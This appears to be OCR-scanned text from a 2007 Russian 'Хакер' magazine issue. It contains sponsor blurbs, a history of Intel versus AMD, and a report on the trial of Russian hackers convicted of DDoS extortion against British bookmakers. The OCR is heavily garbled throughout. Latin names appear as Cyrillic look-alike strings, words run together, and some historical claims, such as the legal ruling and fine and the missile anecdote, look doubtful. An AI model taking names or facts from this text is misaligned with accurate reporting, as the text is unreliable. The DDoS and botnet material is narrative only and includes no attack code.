/•К Р □ ѴѴ Е Р 

Г 1 

Астероѵѵег — энергетический партнер ІООхРагІу 

Большое спасибо компании Астероѵѵегза класные призы, а также за то, что 
оживили наш старый ноутбук Беіі Б600, который мы нещадно юзали в ходе 
проведения вечеринки. Раньше он работал без розетки минут 20, а с новым 
аккумулятором Астрероѵѵег стал выдавать по 3 часа автономной работы! 
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плісгоІаЬ 

ТееІ сШегепІ 

МісгоІаЬ — акустический партнер ІООхРагІу 

М і с го Іа Ь подогнала нам отличную акустику МІСВОБАВ Х-25, которой 
очень довольны победители наших конкурсов и очень недовольны сосе- 
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ІпіеІ Ѵ5 АІѴІО 



История противостояния 

Пожалуй, два самых известных конкурента на рынке железа — ІгДеІ и АІѴГО. 

Их конкуренция длится уже не один десяток лет, и та и другая сторона имеет 
тысячи ярых фанатов и не меньше противников. Сегодня твоему вниманию 
предлагается хроника противостояния. Сравни историю двух самых крупных 
производителей процессоров. 



Зарождение 

Ігйеі (ІЫТедга1:есІ Ейесігопісз Согрогайоп) была основана в самый разгар 
холодной войны, в 1968 году химиком и физиком Гордоном Муром, физиком 
Робертом Нойсом и еще одним ученым — Зндрю Гроувом. 

Познакомились они, работая в компании РаігсЫІсІ Зетісопсіисіог. Именно 
эта компания разработала и первой в мире выпустила в продажу интеграль- 
ную микросхему. В 60-х годах прошлого века РаігсЫІсІ Зетісопсіисіогбыла 
одной из ключевых корпораций, оказавших серьезное влияние на разви- 



тие ныне всемирно известной Кремниевой долины. 

Новоиспеченная Іпіеі поставила перед собой цель разработатьдоступные 
и простые (как в обращении, так и в плане производства) микросхемы па- 
мяти. Стоит отметить, что Гордон Мур еще в 1965-м выявил интереснуютен- 
денцию, сегодня известную как «закон Мура». Он обратил внимание, что 
емкость каждой новой микросхемы памяти ровно в 2 раза больше емкости 
предыдущей модели. Ановые модели появлялисьраз в 18-20 месяцев. Ис- 
ходя изэтого, легко можнобылоспрогнозировать, когда какая схемаувидит 
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свет. Закон Мура работает и в наши дни. 

АМй (Абѵапсеб Місго Оеѵісез) основана почти в то же время — в 1969 году. 
Отцы-основатели — Джерри Сандерс, Эд Терни и еще 6 инженеров. Лю- 
бопытно, но все они тоже были выходцами из РаігсЬіІсІ Бетісопсіисіог. 
Сандерс вовсе не был ученым — в молодости он мечтал о кинокарьере, 
однако окончил университет Иллинойса и стал инженером-электронщи- 
ком. Вскоре, поняв, что как инженер он всеже карьеры не сделает, Джерри 
занялся маркетингом. В РаігсЬіІсІ Зетісопсіисіог он занимал пост дирек- 
тора по продажам. 

Новую фирму Сандерс рассматривал в первую очередь как возможность 
реализации своих маркетинговых идей — он умел продавать и хотел это 
делать так, как считает нужным. Поэтому логично, что у самого Сандерса 
интересных разработок, научных теорий и всего прочего, касающегося 
содержательной стороны развития компании, не было, на то в ней имелся 
коллектив талантливых инженеров. АМй взяла курс на производство по- 
лупроводниковых приборов. 

70-е годы 

Финансирование Іпіеі предоставил тот же инвестор, что поддерживал 
РаігсЬіІсІ. Сумма начального бюджета равнялась двум с половиной мил- 
лионам долларов. Здесь компании повезло, учитывая, что их бизнес-план 
занимал всего одну страницу, был составлен лично Робертом Нойсом, 
строился назаявленияхобщего характера и, ко всему прочему, изобиловал 
ошибками и опечатками. 

Какуже отмечалось, до процессоров Іпіеі производила микросхемы памя- 
ти. В 1970-м фирма выпустила свой первый продукт — 1 1 03 О РАМ (Оупатіс 
гапбот ассезз тетогу) объемом 1 килобит (1024 бита, или 128 байт). В 
первый год работы доход компании составил всего 2672 дол- 
лара. Разработки пользовались популярностью, но о мировой 
славе и сверхприбылях говорить было рано. 

Все изменилось, когда в 1971-м к Іпіеі обратилась японская 
компания Вивісогп, занимавшаяся продажей калькуляторов, 
с предложением заключить контракт на создание 12 специа- 
лизированных микросхем. У Іпіеі не было требующихся для 
этого ресурсов и средств, однако выход из положения нашел- 
ся — было принято решение вместо 1 2 схем создать одну уни- 
версальную. Ее разработка продолжалась в течение девяти 
месяцев, изанималасьей группа под руководством Федерико 
Феджина. Так на светпоявился первый микропроцессор Іпіеі 
4004, который состоял из 2300 транзисторов, работал на час- 
тоте 1 08 КГц и стоил около 200 долларов. Производительность 
одной его маленькой детальки равняласьпроизводительнос- 
ти знаменитого компьютера 40-х годов ЕЫ I АС, который зани- 
мал 85 кубических метров. Руководству Іпіеі стало ясно, что 
перспективы в этой области велики, и компания выкупила все 
права на 4004у Вивісогп за 60000 вечно зеленых. 

В 1972 году на базе 4004 Іпіеі выпускает 8-разрядный процес- 
сор I піеі 8080, на основе которого затем будетсобран ІпІеІАІіаіг 
— первый успешный по производительности и продажам ПК. 



Но в это время компания продает не столько сами процессоры, сколько 
мануалы кним. I пГеІ занимается рекламой, проводит семинары для инже- 
неров и всеми средствами убеждает общественность, что будущее именно 
за микропроцессорами. 

Путь развития АМй был иной. Бюджет новоиспеченной фирмы составлял 
всего 100000 долларов, и она не выпускала своих продуктов, продавая 
усовершенствованные разработки других компаний (источники питания, 
различные чипы и т.д.). Чтобы привлечь покупателя, АМО использовала 
хитрый ход — тестировала всетовары по стандартам армии США, которые, 
само собой, гораздо жестче стандартов потребительского рынка. При этом 
цена оставалась лишь немногим выше цен на аналогичные товары граж- 
данского уровня. 

В 1 972 году компания стала публичной, разместив свои акции на мировых 
биржах. А в 1973-м АМй отрывает первое представительство за границей, 
в Малайзии. Штат сотрудников компании расширяется, АМБ производит 
более двухсот различных наименований товаров (большей частью клони- 
рованные и немного измененные продукты других фирм). К 1974 году объем 
продаж составляет около 26 миллионов. В этом же году АМй выходит на 
рынок РАМ-памяти, выпустив свой собственный чип Агп9102. Также вы- 
пускается клон процессора I пГеІ 8080 — І8080А и в 1 976 году заключается 
контракте I піеі о совместном лицензировании. В 1 979 году о АМО упомина- 
ют в МУ5Е (ІЧеѵѵѴогк Біоск ЕхсЬапде], что говорито росте ее популярности. 
Компания становится известной и набирает немалый вес на рынке. 

80-е годы 

В 80-е для I пГеІ наступила эпоха процветания. Начало было положено в 
1981-м, когда компания выпустила два новых процессора: 8-разрядный 
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> Мур, Нойс и Гроув 



ІпІе18088 и 1 6-разрядный Іпіеі 8086. Последний состоял из 29000транзис- 
торов, и производительность его была в 10 раз больше процессора Іпіеі 
8080. Именносэтого и начался большойуспех. Шуткали, больше 2000 раз- 
личных наград за вклад в развитие высоких технологий — и все за один год! 
Сама архитектура х86 стала почти легендарной и дожила до нашихдней под 
видом стандарта. Софт, написанный под х86, спокойно пойдет на любой 
современной машине. 

х86-архитектура всерьез заинтересовала компанию ІВМ. Машины ІВМ РС 
были выпущены на базе процессоров 8088 и использовали ОС М іеговой 
005. Однако ІВМ, не желая попасть в прямую зависимость от Іпіеі как от 




>ІпІе14004, выпущенный в 1971 году 



ни одной компанией. По словам представителей АМй, это не что иное, как 
попытка добиться монополии на рынке процессоров для ПК. Прибавим к 
этому, и то что середина 80-х годов была трудным периодом для всех за- 
падных компаний-производителей РАМ-чипов. Дело в том, что рынок ок- 
купировали корейские и японские компании, состязаться с которыми было 
практически невозможно. АМй несла огромные убытки. Началось массо- 
вое сокращение штата сотрудников. Сандерс, будучи директором компа- 
нии, предложил направить усилия в более перспективные области рынка, 
каковым и являлся рынок процессоров для ПК. Но так как АМ 0 совершенно 
не устраивала роль «тени» Іпіеі, параллельно начались разработки по на- 



«КАК БЫ ТАМ НИ БЫЛО, ОБЕ КОМПАНИИ ПРОШЛИ ДЛИННЫЙ ПУТЬ, ДОЖИЛИ 
ДО НАШИХДНЕЙ И ПРОДОЛЖАЮТ КОНКУРИРОВАТЬ, СУДИТЬСЯ И ПОСТАВ- 
ЛЯТЬ МИРУ НОВЫЕ ТЕХНОЛОГИИ». 



единственного производителя и поставщика, выдвигаетусловие — найти 
и предоставить еще одного изготовителя чипов. В 1982 году модельный 
ряд пополняется процессором 286 (он же І286) и ІВМ выпускает на его ос- 
нове компьютеры РС-АТ. Тогда же происходит подписание соглашения по 
обмену технологиями с АМй, согласно которому АМО становится вторым 
поставщиком процессоров архитектуры х86. Таким образом, требование 
ІВМ было выполнено. 

1984 год приносит компании Іпіеі процессор І386, первый 32-разрядный 
процессор для ПК, и серьезную реорганизацию внутри фирмы. Конкурен- 
ция на рынке велика — процессоры 8080 и 8086 вовсю производятся по ли- 
цензии компаниями 2іІод и АМО. Гроув принимает решение отказаться от 
большей части бизнеса, связанного с йРАМ, и сосредоточить все ресурсы 
компании на производстве процессоров. Этот ход, вкупе с выпуском І386, 
был призван монополизировать рынок процессоров, сделав I піеі единс- 
твенным поставщиком 386-х. 

Для АМй 80-е были этапом формирования. Именно тогда компания стала 
тем, чем является на сегодняшний день — производителем процессоров и 
врагом Іпіеі. В результате расширения соглашения с Іпіеі, АМО получает 
доступ к процессорам І286 и выпускает их клона — Ат286. Несмотря на то 
что АМй вто время была чем-то вроде побочного филиала Іпіеі, компания 
уверено держаласьна плаву, ее продажи росли. Но большую частьприбыли 
ей по-прежнему приносила оперативная память. Джерри Сандерс дейс- 
твительно хорошо умел продавать. Стратегия компании состояла в увели- 
чении количества собственных разработок и инвестиций в них же. 

В 1984 году АМО попадаетв список«100 лучших компаний, работающих в 
Америке». И вто же время Іпіеі пытается не допустить покупки прав на І386 



правлениям коммуникационных чипов, программируемой логики и высо- 
копроизводительной памяти. 

В 1987 годуАМ 0 подала на Іпіеівсуд. Причиной иска послужил отказ Іпіеіот 
предоставления дизайна І386. Производство клона процессора выглядело 
очень зама нч иво, а отказ противоречил соглашению между фирмам и. В ка- 
честве ответныхдействий Іпіеі разрывает соглашение вообще. Наверное, 
тебе интересно, почему Іпіеі не поступил атак раньше и почему продолжала, 
по сути, поддерживать АМй на плаву? Все дело в законодательстве США, 
а точнее, в антимонопольных законах. Ну и, конечно, в военных. Ракеты, 
которыми в ту пору бомбардировали Сербию, Афганистан, Ирак, комплек- 
товались чипами производства АМО. И военные не были заинтересованы 
втом, чтобы напрямую зависеть от какой-то одной компании. 

90-е годы 

Многолетняя судебная тяжба Іпіеі против АМй завершилась лишь в 
1991 году не в пользу Іпіеі. Компания дважды подавала апелляцию, ос- 
паривая принятые судом решения. В итоге Верховный суд Калифорнии 
постановил, что у АМй есть все права на использование технологии х86 
и получение дизайна нового процессора, а также обязал Іпіеі выплатить 
штраф в размере 1 миллиарда долларов. 

Казалось бы, АМй добилась всего, чего хотела, но нет — за 4 года много 
воды утекло. Еще в конце 1989-го Іпіеі представила вниманию публики 
свою новую разработку — процессор 486. Параллельно с этим была начата 
работа над процессорами под кодовыми названиями Р5 и Р6. 

Р5, выпущенный в 1993 году, оказался процессором ІпІеІРепбитсЗ.І мил- 
лиона транзисторов и производительностью в 5 раз выше 33 МГц 486РХ 
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> Клон Іпіеі 8080 — І8080А 



(благодаря суперскалярной архитектуре). Далее, в 1995-м 
последовал релиз Р6 — Репбшп Рго, в 1997-м — Репбит II, и 
в 1999-м — Репбит III. В 1995 году Гордон Мур внес поправку 
в закон Мура, увеличив время выхода новых моделей до двух 
лет. 

В 1997 году пост президента занимает Крейг Баррет, начав- 
ший работу в Іпіеі простым менеджером в 1 974-м. 
Одновременно с выпуском на рынок все новых и новых изде- 
лий Іпіеі упорно борется с конкурентами, и делает она это в 
основном посредством судебныхисков. Повестки в суд просто 
сыпались на компанию АМО. И пусть судебныетяжбы не при- 
носили Іпіеі побед, зато серьезно задерживали выход про- 
дуктов АМР и вообще ставили им палки в колеса. Эта тактика 
срабатывала просто великолепно. 

90-е стали тяжелыми временами для АМО. Копия І386 — 
Ат386, появившаяся в продаже в 1991-м сильно опоздала. 
Ктомуже Ат386 превосходила оригинал потактовой частоте, 
хотя микрокод процессоров совпадал полностью. Іпіеі не за- 
медлила этим воспользоваться и подала в суд за нарушение 
авторских прав. АМ Б продолжал а торговать Ат386 и во время 
судебного процесса, делая ставку на невысокую цену, привле- 
кающую покупателей. В 1992-м суд постановил, что Іпіеісама 
нарушаетсоглашение 1982 года, и выдал АМО права на І386. 
Однако бесконечными исками Іпіеі все же добивалась свое- 
го. Яркий пример тому — задержка выхода Ат486 в том же 
1992 году. Тогда суд вынес решение, что АМ 0 все же нарушает 
интеллектуальные права и не должна использовать микрокод 
Іпіеі. Выхода Ат486 это, конечно, не остановило, но привело 
к задержке, так как микрокод пришлось менять. И мен но тогда 
АМО начала разработку собственного х86-микрокода, чтобы 
показать технологическую независимость. 

В середине 1 993-го Ат486 все же выходит, и анализ пока- 
зывает, что микрокод на добрую четверть совпадает с кодом 
от Іпіеі. Да, разумеется, Іпіеітутже подает в суд, но процесс 
проигрывает. Однако АМО тепе рьтер пит поражение на дру- 
гом фронте — акции компании падают в цене на 1 0%. Слов- 
но издеваясь, в 1994-м Іпіеі подписывает с АМО контракт, 
разрешая, наконец, продажу процессоров с микрокодом 
І287, І386, и І486. У Іпіеі тогда уже был практически готов 
Репбит, и можно было спокойно предоставлять права на 
старые модели. 

Война есть война, поэтому еще в 1 993-м группа инженеров 
АМО во главе с Майком Джонсоном начала работу над со- 
вершенно новым процессором Кгуріоп (также известным 
как Репіішп Кі Пег и АМО К5). К5 должен был работать в 5 
раз быстрее Репбит. Так как разработка велась с нуля, про- 
цесс занял много времени. Фирма держалась на плаву бла- 
годаря совместному с Рщ’іізи выпуску флеш-памяти и чипу 
Ат5х86-Р75 пятого поколения, который, несмотря на пятер- 
ку в маркировке, по сути, был 486-м. Большим подспорьем 
в создании К5 стала покупка в 1996 году за 850 миллионов 
долларов компании Ыехбеп (кстати, на деньги, отсуженные 
у Іпіеі). У Ыехбеп были свои уникальные архитектурные на- 
работки, не имеющие никакого отношения к Іпіеі, но не было 



возможности продавать их. У АМО же была возможность 
продавать, но не было наработок. Таким образом, фирмы 
буквально нашли друг друга. Инициатором слияния стал 
директор Ыехбеп — Аттик Раза. 

Но и К5 опоздал с выходом. Процессор функционировал на 
частотах 75 и 90 МГц, вто время какІпІеІРепбитуже выжимал 
133 МГц. Оставалосьтолько снижать цены и использовать РР- 
рейтинг, доказывая, что реальная производительность К5 при 
работе с приложениями выше, чем у Репбшп. 

Вслед за К5 в 1 997-м вышел Кб, который действительно смог 
составить конкуренцию процессорам Іпіеі. Но триумф длился 
недолго — с выходом Репбшп II все вернулось на круги своя. 
И снова снижение цен. Снижение в ущерб компании. Джер- 
ри Сандерс едва не лишился своего поста директора, но этим 
рискованным маневром АМО все же удалость привлечь по- 
купателей. 

Релиз Кб- 1 1 в 1998-м прошел успешно. Начались разработки 
линейки К7, всем известной какАМР АіЫоп. Возглавил ихАт- 
тик Раза, также возглавивший и компанию в целом. 

В 1999-м АМО выпускает Кб -III, который не приносит фирме 
ничего хорошего. Алетом, когдауже почти готов К7, Аттик Ра за 
покидает АМО. Бытует мнение, что причиной его ухода стали 
разногласия с Сандерсом. Релиз К7 АМО АіЫоп состоялся в 
конце того же года и стал крупной удачей, наконец вытащив 
копанию из финансовой пропасти. 

2000-е годы, наше время 

Битва титанов продолжается и по сей день. Наступление XXI 
века мало что изменило в отношениях Іпіеі и АМО. В 2000-м 
постисполнительного директора АМОзанял Гектор Руис, при- 
шедший из компании Моіогоіа. Уже в 2002-м он стал прези- 
дентом компании, а Сандерс остался почетным членом совета 
правления. Вместе с его президентством в истории компании 
окончилась целая эпоха длинной в 30 лет. В 2006-м был офи- 
циально подтвержден факт слияния АМО и производителя 
графических чипов АТІ. Сумма сделки — 5,4 миллиарда 
долларов. 

Не обошлось без кадровых перестановок и в Іпіеі — с 2005 
года и по сей день у руля стоит Пол Отеллини (Раиі Оіеіііпі), 
пришедший на смену Баррету. Гроув же занимает почетную 
должность специального советника компании. Одна из круп- 
ных побед Іпіеі в новом тысячелетии — заключение контакта с 
Арріе. Теперь и Макинтоши работаютна процессорах Іпіеі. 
Новым оружием в противоборстве стали двухъядерные про- 
цессоры: АіЫоп 64X2 и Бетргоп от АМО и Іпіеі Соге 2 от Іпіеі. 
Обе стороны, как уже упоминалось, имеютсвоих верных при- 
верженцев и противников. И пожалуй, общий итог — ничья. 
Неизвестно, как развивалась бы история Іпіеі, не имей она 
вечно наступающего на пятки конкурента в лице АМО. И что 
бы делала АМО, если бы не было I піеі и она не начала бы про- 
дажу клонов Іпіеі’овских процессоров... 

Как бы там ни было, обе компании прошли длинный путь, до- 
жили до наших дней и продолжают конкурировать, судиться и 
поставлять миру новыетехнологии. ІЗС 
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— официальный сайт 
Іпіеі ; 
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— официальный сайт 
АМО; 

ШрУ/ги.ѵѵікіресІіа. 
огд/ѵѵікі/Спи- 
сок микропроцессо- 
ров Іпіеі — полная 
хронология микро- 
процессоров Іпіеі; 
ЬирУ/ги.ѵѵікіресііа. 
огд/ѵѵікі/Спи- 
сок микропроцессо- 
ров АМР — полная 
хронология микро- 
процессоров АМО. 
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Самый громкий процесс по делу российских хакеров 

Если ты читаешь эту статью, то наверняка словосочетание «компьютерный взлом» не явля- 
ется для тебя каким-то загадочным. Ты точно знаешь, что такое переполнение буфера, где 
хранит свои пароли популярный клиент ІСС) и каким эксплойтом похоронить веб-форум. 
Но задумывался ли ты о возможном наказании? Скорее всего, широко улыбаясь, ты думал, 
что твоя жизнь и Уголовный кодекс — это две совсем разные реальности. 

Прости, но мне придется тебя разочаровать... 



С чего начинается кибертеррор 

Тимур Арутчев — совсем не хакер. Он обычный житель провинциального го- 
рода Пятигорска. Окончил Лингвистический университет, два года работал 
в Штатах. В совершенстве владеетанглийским и испанским языками. Во 
время описываемых событий — осенью 2003 года — Тимуру было 33 года. 

Кто и когда рассказал ему отаком сомнительном виде бизнеса, каксетевой 
рэкет, неизвестно. Но идея шантажа компаний угрозами виртуальных атак 
показалась ему однозначно привлекательной. 

Тимур ищет исполнителей, профессионалов в ИТ-деле. Находитон их на 
одном из хакерских форумов, знакомясь с юзером геТ Под этим ником 



скрывется Александр Петров. Петров родился и жил в Астрахани. Только 
что закончил Академию права и собирался работать в таможне. По иронии 
судьбы отцом Саши был начальник астраханского отдела «К». 

Петров принимает предложен ие Арутчева, соглашаясь стать организато- 
ром ООоБ-атак. Но водиночкуему не справиться. Александр обращается 
за помощью ксвоим друзьям — Ивану Максакову из Балакова и Денису 
Степанову из Москвы. Двадцатидвухлетний Иван учился в Балаковском 
институте техники, технологии и управления. Несмотря на то что ком- 
пьютер появился у него немногим больше двух лет назад, Иван хорошо 
разбирается в вопросах интернет-безопасности, и техническая сторона 
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дела во многом держится на нем. Денис Степанов в среде питерских ком- 
пьютерщиков вообще считается профессионалом. На одной из выставок 
высокихтехнологий он читал доклад о рекламе в интернете, написанный 
им для российскойторгово-промышленной палаты. Поговаривали, что 
Дениса приглашали работать в крупную столичную фирму на должность 
коммерческого директора. Добился бы он успехов в коммерции — этого 
мы не знаем, но хакером Денис был определенно неплохим. 

Помимо Степанова и Максакова, Петров приглашает в команду двух 
человек из Казахстана, чьи имена неизвестны до сих пор. Таким образом, 
отряд хакеров для интернет-войны сформирован. 

Атака на букмекеров 

В качестве главного объекта атак были выбраны букмекерские конторы 
Великобритании. Оно и понятно — ставки англичане делатьлюбят, кроме 
того, деньжата у букмекеров всегда будут. Сам виртуальный рэкеттипичен 
и даже немного банален. 

В дождливый британский день на етаіі веб-мастера сайта конторы 
приходит письмо: «Ваши серверы под угрозой. Не исключено, что сегод- 
ня неблагоприятная фаза Луны для работы Вашего сайта. Он можетне 
работать. Но за энную сумму денег мы все исправим, починим — и будет 
счастье». Энная сумма — это от 5 до 50 тысяч долларов. 

Так как Англия — страна продвинутая, то ставки большая часть людей 
предпочитает делать непосредственно в Сети, используя кредитные 
карты и электронные платежные системы. 

Серверы валили по излюбленной и проверенной годами технологии 
— ООоБ-атакой ЮізІтіЬЩесі Оепіаі о^ Зегѵізе АЛакв]. Сеть компьютеров- 
ботов находилась в США, в Хьюстоне. Скорее всего, они были заражены 
троянскими программами. Предположительно, сетьзомбированных 
машин создал Максаков. Использовал ли он готовые решения или напи- 
сал своего червя сам — неясно. В назначенный час все зараженные ПК 
начинали посылать пакеты на ІР-адреса серверов, блокируя их работу. 
Атаке подверглась и крупнейшая букмекерская контора Британии СапЬеІ: 
ЭроНз Вооктакегз Ш. Отказавшись заплатить 10 штук баксов, англича- 
не получили полную неработоспособность серверов в дни чрезвычайно 
популярных скачек на Кубок Бридерса. День простоя стоил букмекерам 
около 200тысяч долларов. Не видя иного выхода, бизнесмены заплатили. 
Подобного рода атакам подверглись 8 британских букмекерских сайтов 
и онлайновых казино. Цифры, правда, называют разные. Доходит до 54 
атак в 30 региональных сегментах глобальной сети, но это кажется мало 
правдоподобным. 

Денежные потери бизнесменов варьировались от 1 до 70 (!) миллионов 
долларов. Одна только фирма ВІиеБциаге НО. заявила об ущербе вболее 
чем 1 ,3 миллиона. 

Деньги переводились хакерам по системе ѴѴезІегп ІІпіоп. Сначала в Лат- 
вию, на подставных лиц, а уже оттуда в Пятигорск. Там их получали Тимур 
Арутчев и его гражданская жена. 



УГОЛОВНЫЙ КОДЕКС. ВЫРЕЖИ И СОХРАНИ! 
Статья 272. Неправомерный доступ к компьютер- 
ной информации. Наказывается сроком лишения 
свободы до пяти лет. 

Статья 273. Создание, использование и распро- 
странение вредоносных программ для ЭВМ. Нака- 
зывается сроком лишения свободы оттрех 
до семи лет. 

Статья 274. Нарушение правил эксплуатации ЭВМ 
системы ЭВМ или их сети. Наказывается сроком 
лишения свободы до четырех лет. 




Операция «Каттерик» 

После очередного вымогательства одна из компаний обра- 
тилась в полицию. К расследованию подключилисьФБР и Ин- 
терпол. В конце концов на одном из компьютеров бот-сети в Хьюстоне 
засветился российский ІР. Толи Иван Максаков забыл включить прокси, 
толи анонимные прокси-серверы дали сбой. Скотленд-Ярд обратился к 
МВД России, а здесьуже был задействован тот самый отдел «К». 

Осенью 2004 года Иван Максаков и Денис Степанов были арестованы. На 
следствии говорилось, что на вычисление хакеров пришлось потратить 
около четырех месяцев. Астраханец Петров попался в начале 2005 года. 
Также в Латвии были задержаны подельники хакеров, участвовавшие в 
переводе денег. При всех арестах присутствовали представители британ- 
ской полиции. Ходят слухи, что операция под кодовым названием «Кат- 
терик» была под контролем у премьер-министра Великобритании Тони 
Блэра, сильно обеспокоенного неприятностями букмекерских контор. 
Двух жителей Казахстана взять не удалось — МВД этой страны проигно- 
рировало запросы российской и британской сторон. Арутчева сначала не 
задержали, но об этом ниже. 

В сентябре-октябре 2006 года состоялся самый скандальный судебный 
процесс из всех, что когда-либо проходили над «компьютерными» пре- 
ступниками. Парней обвиняли по статьям 1 63 (вымогательство денежных 
средств в особо крупных размерах) и 273 (использование вредоносных 
программ). Каждому грозило по 1 5 летлишения свободы. 

Надо оговориться, что описание создания и действий группы хакеров — это 
лишьпересказанная версия следствия. Веритьей или нет — делотвое. 



Суд 

Суд проходил в Саратовской области, в городе Балаково. Видимо, 
оперативники решили, что Иван Максаков — самый опасный изхакеров, 
и потому процесс был организован в его родном городе. Виртуальное 
дело и на суде оставалосьтаким же — фигурировали в основном ники 
подозреваемых: іе{, ххх, Іісбпо ват и прочие. Часть из нихудалось пер- 
сонифицировать, а часть так и осталась набором латинских букв. На суде 
было заявлено, что Арутчев и его жена были организаторами перегово- 
ров с компаниями и занималисьсобственно вымогательством, а парнях 
держаласьтехническая сторона. Сообщали даже о распределении ролей: 
Максаков делал вирусы, Петров давал команду б от- сети ит.д. 

По началу следствие во многом держалось на показаниях Максакова, 
который подтвердил, что он стоварищами занимался ООоБ-атаками. Но 
после Иван заявил, что, давая показания, он находился под психологи- 
ческим давлением. Адвокат Максакова Петр Рябов рассказал, что в 
2003 году его подзащитному действительно предлагали заняться сетевым 
рэкетом, но Иван отказался. 

Материалы дела, касающиеся Тимура Арутчева, выделили в отдельное 
уголовное дело. Тимур был объявлен в розыск в январе 2005 года. Об этом 
весьма его удивившем факте он узнал лишь полтора года спустя, когда 
нарушил правила дорожного движения и был остановлен инспектором 
ГИБДД. Все эти полтора года он жил по месту прописки в Пятигорске, 
ни от кого не скрывался и никаких повесток не получал. Узнав о суде в 
Балакове, Тимур приехал туда. На суде Арутчев заявил, что ни к какому ки- 
бертерроризму отношения не имеет, подсудимых видитвпервые вжизни 
и что вообще сильно удивлен всей этой историей. Хакеры надеялись на 



/ 093 



ХАКЕР 06 /102/ 07 





сцена 



>> 



показания Тимура, ведь Арутчева обвиняли в организации всей группы. А 
не будетже человек, неуверенный в своей невиновности, сам приезжать 
на суд и давать показания? Но Тимура повязали прямо в зале суда. 
Основными доказательствами вины хакеров стали Сй-диски с набором 
вирусных программ. Этого, согласись, маловато. Поэтому в день огла- 
шения приговора, 3 октября, ребята были весьма спокойны и уверены в 
оправдательном вердикте. 

Приговор ввел всех в состояние шока. 8 лет строгого режима. Каждо- 
му. И каждый же должен был выплатить еще 100 тысяч рублей в пользу 
государства... 

В залетихо плакала девушка Саши Петрова. Мать Максакова охранники с 
трудом оттащили от сына. Денис Степанов через адвокатов что-то пытался 
передать родственникам. Самый суровый приговор в истории мирового 
хакерства был оглашен. 

Засудили? 

Дело это совсем не однозначное, и возникает целый ряд вопросов. Из всех 
переводовденег— а какмы помним, хакеры заработали чутьли не4миллиона 
долларов — был подтвержден только один, на 40 тысяч. И какое отношение они 
имеют непосредственно кхакерам, сказать сложно. НаѵѵеЬтопеу-кошелек 
Максакова действительно поступали деньги. Но, во-первых, суммы платежей 
были весьма скромными, а во-вторых, выписоксо счетов Арутчева, Петрова или 
других, подтверждающих, что это именно они отправляли деньги, не имеется. 
Как мы уже знаем, главныеулики — найденные Сй-диски. На диске, 
обнаруженному Петрова, так и было маркером крупно выведено: «ХАКЕР». 
И программы, которыетам содержались, были в своей массе вирусами под 
М5-00Б. Как с помощью такого набора софта заработать 4 миллиона, суд 
не объяснил. Но гораздо интереснеето, чтоу Максакова был найден диске 
точнотакимже набором программ! Оченьстранное совпадение, однакоже. 
В Сети создали сообщество гавибШ.ЦуеригпаЕсот . где были представ- 
лены аргументы в защиту ребят. По рунету распространилось обращение 
друзей Саши Петрова, доказывающих абсурдность обвинения. 

В обращении было сказано, что компакт-диск был подброшен, а програм- 
мы на нем — утилиты, написанные в 1995-1997 годах. И подобным софтом 
букмекеров не поломаешь. 

На ребятоказывалось давление, а адвокат Петрова даже не приехал 
на оглашение приговора — не исключено, что под давлением органов. 
Защита хакеров указывает на смену экспертов во время суда. Первый 
эксперт доказывал бесполезность программ на пресловутом Сй, а новый 
уже четко работал на следствие, утверждая, что (цитирую обращение) «от 
хакеров падают самолеты и взрываются АЭС». 

Это еще не все. Дактилоскопическую экспертизу компакт-диска, со сняти- 
ем отпечатков пальцев и прочим, не провели. Таким образом, доказатель- 
ства, что диски действительно принадлежали хакерам, а не подброшены, 
предоставлены не были. 

Крометого, вызываетудивление ажиотаж вокруг процесса. На оглашение 
приговора приехали представители всех шести федеральных каналов. 
Также присутствовали представители Великобритании. Друзья Петрова, 
говоря об этом, называют процесс «заказухой». 

Один из экспертов назвал это обращение «грустный бредом». Для объек- 
тивности изложу ниже его аргументы. 

1. Нелояльности суда не было. Все заседания записывались на самые 
надежные носители — ноутбуки подсудимых. 

2. Некомпетентность экспертов. Во время суда ни один довод экспертов 
не был опровергнут. Эксперты поясняли обвиняемым, где и на чем они 
прокололись. Уровень экспертов был очень высок. 

Это основное. Еще там разносится «английский след» — мол, большие 
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сроки не связаны стем, что дело находилось 
под контролем Скотленд-Ярда, адвокаты 
упрекаются в некомпетентности в области ком- 
пьютерных вопросов и даже говорится пара слов о 
нашем журнале. «Хакер» называется провокаторским. 
Полностью мнение эксперта, согласного с приговором, 
можно прочесть на сайте \лдлАЛ/.еШ : .ги . 



Выдержки из приговора 

Я бы рад согласиться с экспертом, но оставлю свое мнение при себе. Атебе пре- 
доставляю возможность «насладиться» некоторыми выдержками из приговора. 

. . .запуск на зараженном компьютере 50К5 




Все бы ничего, но обвинение даже не знает, как правильно пишется слово 
БОСКБ.Хотя, может, это всего лишь опечатка? 



Ыикег. \/Ѵіпз2.0о8, Ыикег. УѴіпз 2 .Віѵіпе («Лаборатория Касперского» ) 

— утилиты , отправляющие специально сформированные запросы на 
атакуемые компьютеры в сети , в результате чего атакуемая система 
прекращает работу, использующие уязвимости в программном обеспече- 
нии и операционных системах. . . 

Ээээ... Нюкер.вин32.дос? Завалить работу серверов нюкером под 95-й 
маздай — это очень круто. 

Вещественные доказательства по делу: компакт-диски, системный блок, 
2 ноутбука, изъятые у подсудимых — уничтожить как орудия преступ- 
ления... 



Уничтожить. Интересно, как именно это было сделано. Их переплавили, 
что ли? И в чем повинны ноутбуки? Нельзя было просто отформатировать 
жесткий диск? Чем вообще опасны компьютеры, если их владельцы уже 
сидят втюрьме? 

На вопрос журналистов о том, было ли у суда достаточно доказательств, 
эксперт Игорь Юрин ответил так: 

«В ходе экспертиз мы обнаружили множество исходников вредоносных 
программ: антивирусные программы не детектируют их, но на их основе 
можно быстро создать новые вредоносные программы. Были найдены не 
только распространенные версии вредоносных программ, но и авторские 
разработки. Некоторые из них были представлены даже в нескольких 
версиях. Например, найдена совершенствуемая во времени последо- 
вательность версий бота (с исходниками), которая разрабатывалась и 
использовалась участникам и истории». 

Участники, кстати, и не отрицали. Да, у них были исходные тексты неко- 
торых программ. Но они пользовались ими исключительно для ознаком- 
ления, а не для вреда другим пользователям. Хранение программ — это 
единственное, что согласились признать хакеры из всего приговора. Что 
ж, суду оказалось достаточно. 

Постскриптум 

Эта история не плод больного воображения. Это наши дни, это наша 
страна. Аэти парни — обыкновенные компьютерщики, каких немало. 
Хакерство не игрушки. За него действительно можно сесть в тюрьму. На 
троих Петров, Степанов и Максаков получили 24 года лишения свободы. А 
твоя болваночка с модифицированными эксплойтами по-прежнемулежит 
на самом видном месте рабочего стола? □с 
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[СЕРГЕЙ «0ВІЫРЕВ» ЯРЕМЧУК 



Весна порадовала всех линуксоидов многочисленными релизами. Особняком стоит по- 
